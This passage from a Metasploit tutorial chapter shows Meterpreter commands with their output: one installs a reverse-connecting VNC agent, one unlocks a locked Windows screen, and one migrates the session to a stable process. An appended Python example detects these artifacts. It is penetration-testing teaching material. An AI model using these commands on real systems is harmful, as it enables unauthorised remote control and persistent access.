Chapter 6

Using Meterpreter Scripts

Several external Meterpreter scripts can help you to enumerate a system or 
perform predefined tasks inside the Meterpreter shell. We won’t cover every 
script here, but we will mention a few of the most notable ones.

NOTE

The Meterpreter scripts are in the process of being moved to post exploitation modules. 
We’ll cover both scripts and post exploitation modules in this chapter.

To run a script from the Meterpreter console, enter run scriptname. The script will either execute or provide additional help on how to run it.

Should you want to use an interactive remote GUI on the system, you can use the VNC protocol to tunnel the active desktop communications and interact with the GUI desktop on the target machine. But in some cases, the system may be locked and you may be unable to access it. Never fear: Metasploit has us covered.

In the following example, we issue the run vnc command, which installs a VNC session on the remote system. From there, we launch run screen_unlock to unlock the target machine so that we can view the desktop. As a result, a VNC window should appear, showing us the target desktop.

meterpreter > run vnc

[*] Creating a VNC reverse tcp stager: LHOST=192.168.33.129 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 37888 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\CTDWtQC.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.33.129:4545...
[*] VNC Server session 2 opened (192.168.33.129:4545 -> 192.168.33.130:1091)

This will give us a VNC graphical interface to the target machine and allow us to interact through a desktop.

meterpreter > run screen_unlock

[*] OS 'Windows XP (Build 2600, Service Pack 2).' found in known targets
[*] patching...
[*] done!

Migrating a Process

Often, when we are attacking a system and exploiting a service such as Internet Explorer, if the target user closes the browser, the Meterpreter session is also closed and we lose our connection to the target. To avoid this problem, we can use the migrate post exploitation module, shown next, to attempt to migrate the Meterpreter server into another process, one that won't close when the target closes the browser. By migrating to a different, more stable process, we ensure that our process isn't closed and we maintain our connection to the system.

meterpreter > run post/windows/manage/migrate

[*] Running module against V-MAC-XP
[*] Current server process: revterp.exe (2436)
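As an added defensive illustration (not from the book), the two procedures above leave host-side traces that a monitoring pipeline can correlate: an executable written under C:\WINDOWS\TEMP and then launched (the VNC agent upload, which the script notes "must be deleted manually"), and a thread created in a process other than its creator (what migrate does). The log format, field names and PIDs below are constructed assumptions, not any real product's schema.

```python
import re

# Constructed sample log in a simplified key=value format. The schema, the
# image names and the PIDs are assumptions made for this example; they are
# patterned on the chapter's session (revterp.exe, C:\WINDOWS\TEMP\CTDWtQC.exe).
SAMPLE_LOG = """\
event=FileCreate pid=2436 image=C:\\WINDOWS\\revterp.exe target=C:\\WINDOWS\\TEMP\\CTDWtQC.exe
event=ProcessCreate pid=3012 image=C:\\WINDOWS\\TEMP\\CTDWtQC.exe parent_pid=2436
event=ProcessCreate pid=3100 image=C:\\WINDOWS\\notepad.exe parent_pid=1800
event=CreateRemoteThread source_pid=2436 source_image=C:\\WINDOWS\\revterp.exe target_pid=1204 target_image=C:\\WINDOWS\\explorer.exe
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")
TEMP_DIR = "c:\\windows\\temp\\"


def parse_event(line):
    """Turn one key=value line into a dict (values kept as strings)."""
    return dict(FIELD_RE.findall(line))


def find_findings(log_text):
    """Return (rule, subject, detail) tuples for the two artifact patterns.

    Rule 1 needs state: a TEMP executable is only flagged once it is both
    written and later executed, so a mere file drop produces no finding.
    Rule 2 flags any thread created in a process other than the creator.
    """
    findings = []
    dropped_temp_exes = set()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        kind = ev.get("event")
        if kind == "FileCreate":
            target = ev.get("target", "").lower()
            if target.startswith(TEMP_DIR) and target.endswith(".exe"):
                dropped_temp_exes.add(target)
        elif kind == "ProcessCreate":
            image = ev.get("image", "").lower()
            if image in dropped_temp_exes:
                findings.append(("temp_exe_dropped_and_run", ev["pid"], image))
        elif kind == "CreateRemoteThread":
            src, dst = ev.get("source_pid"), ev.get("target_pid")
            if src and dst and src != dst:
                findings.append(("remote_thread", src, dst))
    return findings
```

Running find_findings(SAMPLE_LOG) yields one finding per rule; the unrelated notepad.exe launch is ignored because it was not dropped into TEMP first.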